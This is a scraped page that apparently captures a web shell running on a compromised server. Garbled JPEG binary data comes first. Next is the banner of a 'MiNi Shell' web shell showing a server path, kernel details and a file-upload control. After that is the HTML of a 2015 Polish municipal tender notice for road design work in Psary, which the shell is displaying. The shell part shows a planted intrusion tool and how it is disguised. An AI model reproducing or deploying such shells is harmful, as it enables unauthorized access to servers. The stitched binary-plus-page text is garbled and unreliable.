JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150721/184224-N-2015.html

<p class="kh_header"><b>Psary: Opracowanie kompletnych projektów budowlano - wykonawczych budowy i remontu nawierzchni dróg gminnych wraz z odwodnieniem, na terenie Gminy Psary z uzyskaniem ostatecznej decyzji pozwolenia na budowę/lub braku sprzeciwu rozpoczęcia zgłoszonych robót i sprawowaniem nadzoru autorskiego, w podziale na pięć odrębnych zadań</b><br>
<b>Numer ogłoszenia: 184224 - 2015; data zamieszczenia: 21.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Psarach , ul. Malinowicka 4, 42-512 Psary, woj. śląskie, tel. 32 294 49 00 wew. 41, faks 32 294 49 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnych projektów budowlano - wykonawczych budowy i remontu nawierzchni dróg gminnych wraz z odwodnieniem, na terenie Gminy Psary z uzyskaniem ostatecznej decyzji pozwolenia na budowę/lub braku sprzeciwu rozpoczęcia zgłoszonych robót i sprawowaniem nadzoru autorskiego, w podziale na pięć odrębnych zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Opracowanie kompletnych projektów budowlano - wykonawczych budowy i remontu nawierzchni dróg gminnych wraz z odwodnieniem, na terenie Gminy Psary z uzyskaniem ostatecznej decyzji pozwolenia na budowę/lub braku sprzeciwu rozpoczęcia zgłoszonych robót i sprawowaniem nadzoru autorskiego, w podziale na pięć odrębnych zadań: 
a) Zadanie Nr 1:   siedem  Projektów budowlano - wykonawczych  remontu nawierzchni dróg gminnych.
b) Zadanie Nr 2:   Projekt budowlano - wykonawczy remontu nawierzchni drogi gminnej z dobudową chodnika w Malinowicach ul. Brzozowa oraz Dąbiu Chrobakowym, wraz z odwodnieniem. 
c) Zadanie Nr 3:  siedem - Projektów budowlano - wykonawczych remontu nawierzchni dróg gminnych wraz z odwodnieniem.
d) Zadanie Nr 4:  Projekt budowlano - wykonawczy odwodnienia rejonu skrzyżowania 
ul. Rogoźnickiej z ul. Podwale oraz remont nawierzchni  ul. Podwale
e) Zadanie Nr 5:  Projekt budowlano - wykonawczy przebudowy drogi gminnej ul. Wspólnej wraz z odwodnieniem w Psarach /Gródkowie. Szczegółowe założenia projektowe opisano w załącznikach do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w zależności od Nr zadania w wysokości: - Zadanie Nr 1: 1 000,00 zł (jeden tysiąc złotych), - Zadanie Nr 2: 2 000,00 zł (dwa tysiące złotych), - Zadanie Nr 3: 3 000,00 zł (trzy tysiące złotych), -Zadanie Nr 4: 
1 200,00 zł (jeden tysiąc dwieście złotych), - Zadanie Nr 5: 2 500,00 zł (dwa tysiące pięćset złotych). 2. Wadium może być wniesione w jednej lub kilku następujących formach: pieniądzu,poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Z 2007 r. Nr 42, poz. 275 z późn. zm.). 3. Wadium wnoszone w pieniądzu należy wpłacać przelewem na następujący nr konta: Bank Spółdzielczy w Będzinie Oddział Psary nr:44843800010000025720160003, Uwaga: Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składania ofert. 3.1. Wadium wnoszone w postaci niepieniężnej (w innych dopuszczalnych formach wymienionych w pkt 2), należy złożyć w oryginale w siedzibie Zamawiającego kancelaria ogólna - parter budynku, za potwierdzeniem odbioru w terminie nie późniejszym niż termin składania ofert. 4. Do oferty należy dołączyć potwierdzenie wniesienia wadium to jest: a) polecenie przelewu - jeżeli wadium wniesiono w formie pieniężnej, b) kserokopię dokumentu poświadczoną za zgodność z oryginałem przez Wykonawcę jeżeli wadium wniesiono w formie niepieniężnej</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie  ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie  wykonał co najmniej na:
a) Zadanie Nr 1-  dwie usługi  polegające na opracowaniu  dokumentacji projektowej 
na budowę lub przebudowę lub remont drogi  o wartości  min. 15 tysięcy zł brutto każda.
b) Zadanie Nr 2-   dwie usługi polegające na opracowaniu  dokumentacji projektowej  na budowę lub przebudowę lub remont drogi  o wartości min. 40 tysięcy zł brutto każda.
c) Zadanie Nr 3-   dwie usługi polegające na opracowaniu  dokumentacji projektowej 
na budowę lub przebudowę lub remont drogi  o wartości min. 50 tysięcy zł brutto każda.
d) Zadanie Nr 4-   jedna usługa polegająca na opracowaniu  dokumentacji projektowej na budowę lub przebudowę lub remont drogi wraz z odwodnieniem o wartości  min. 15 tysięcy zł brutto.
e) Zadanie Nr 5-   dwie usługi polegające na opracowaniu  dokumentacji projektowej na budowę lub przebudowę lub remont drogi  o wartości min. 40 tysięcy zł brutto każda, w tym co najmniej jeden projekt z uzyskaniem Decyzji ZRID. 2) Na potwierdzenie powyższego warunku Zamawiający żąda: a) Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, wg załącznika nr 4, oraz załączeniem: b) Dowodów, czy usługi zostały wykonane lub są wykonywane należycie. UWAGA 1: Zgodnie z Rozporządzeniem Prezesa rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane za dowody, o których mowa w pkt. b uznaje się: - poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert; - oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej; 3. W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w uwadze nr 1. 4. W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa w pkt.b) budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi, były wykonane o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu. UWAGA 2: Należy wykazać i przedłożyć dowody wykonania usług w liczbie i zakresie wystarczającym do wykazania spełniania opisanych wyżej warunków. UWAGA 3: W przypadku składania oferty na dwa lub więcej zadań należy wykazać spełnienie warunków dla każdego z zadań osobno</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje na: 1. ZADANIE Nr 1: a) min 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń. 2.  ZADANIE Nr 2: a)  min 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń, b) min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń. 3. ZADANIE Nr 3:
a) min 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń, 
b) min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej
w  zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń 4. ZADANIE Nr 4: a) min 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń, 
b)   min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej w  zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń. 5.  ZADANIE Nr 5: a)min 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń, 
b)  min 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej
 w  zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez  ograniczeń. W celu oceny spełniania przez Wykonawcę warunku Zamawiający żąda: a) Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami wg. załącznika nr 5 do SIWZ, b) Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień wg. zapisów w załączniku nr 5 do SIWZ UWAGA 5: W przypadku składania oferty na dwa lub więcej zadań wykonawca może wykazać dysponowanie tymi samymi osobami w specjalności dla poszczególnych branży</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Należy wykazać i przedłożyć dowody wykonania robót budowlanych w liczbie i przedmiocie wystarczającym do wykazania spełniania opisanego wyżej warunku w sekcji III.3.2.Dowodami, o których wyżej mowa są: - poświadczenie; -z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert; - oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej;. Uwaga: W przypadku gdy zamawiający jest podmiotem, na rzecz którego, roboty budowlane wskazane w wykazie, o którym wyżej mowa, zostały wcześniej wykonane, wykonawca nie ma obowiązku przekładania dowodów o których powyżej mowa; W przypadku składania oferty na dwa lub więcej zadań należy wykazać spełnienie warunków dla każdego z zadań osobno;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - w zależności do Nr Zadania zał Nr 1,1a,1b,1c,1d do SIWZ. 2. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy-ów ubiegającego-cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy składać w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie. 3.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Treść zobowiązania podmiotu trzeciego powinna określać m.in.: dane pozwalające na identyfikację stron, zakres udostępnienia (np: w zakresie wiedzy i doświadczenia , potencjału technicznego), cel i czas udostępnienia. 2. W celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów Zamawiający może żądać od wykonawcy dokumentów dotyczących w szczególności: a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres udzielonej gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania zmian  w umowie w następującym zakresie: 
1. Przedłużenie terminu wykonania przedmiotu umowy (aneks terminowy), w przypadkach:
a) nie wynikających z winy Wykonawcy  i nie możliwych do przewidzenia  w chwili zawarcia umowy t.j. wystąpienia siły wyższe. Siła wyższa oznacza wydarzenie nieprzewidywalne  i poza kontrolą stron umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy.
b) niezawinione przez Wykonawcę opóźnienia ze strony organów  w wydawaniu uzgodnień, opinii i decyzji administracyjnych, konieczność dokonania zmian w dokumentacji w trakcie projektowania w przypadku wniesienia uwag przez mieszkańców (np. w związku z lokalizacja wjazdów lub przyłączy) gestorów sieci bądź inne podmioty, zmiany w przepisach prawnych powodujące konieczność pozyskania nieprzewidzianych wcześniej uzgodnień, opinii i innych dokumentów niezbędnych dla prawidłowej realizacji inwestycji
c) wydłużające się czynności geodezyjne z powodów niezależnych od Wykonawcy
d) przekroczenia przez Zamawiającego terminu 3 tygodni na zaakceptowanie wstępnej wersji projektu bądź wniesienia do niego uwag po tym terminie, termin wykonania przedmiotu umowy zostanie przedłużony odpowiednio o okres zwłoki.
2. Zamawiający przewiduje zmianę wynagrodzenia wykonawcy (ceny) o kwotę wynikającą ze zmienionych ustawowo stawek podatku VAT obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy.
3. Zmiana projektanta wskazanego w ofercie  na pisemny wniosek Wykonawcy lub Zamawiającego w przypadku:
a) śmierci, choroby lub innych niezależnych zdarzeń losowych wskazanych osób
b) nie wywiązywania się w/w osób z obowiązków wynikających z umowy
c) jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np.: rezygnacji)
W przypadku zmiany nowa osoba musi spełniać wymagania określone w specyfikacji istotnych warunków zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.psary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Psarach ul. Malinowicka 4, 42-512 Psary, II piętro pokój 211.</p>
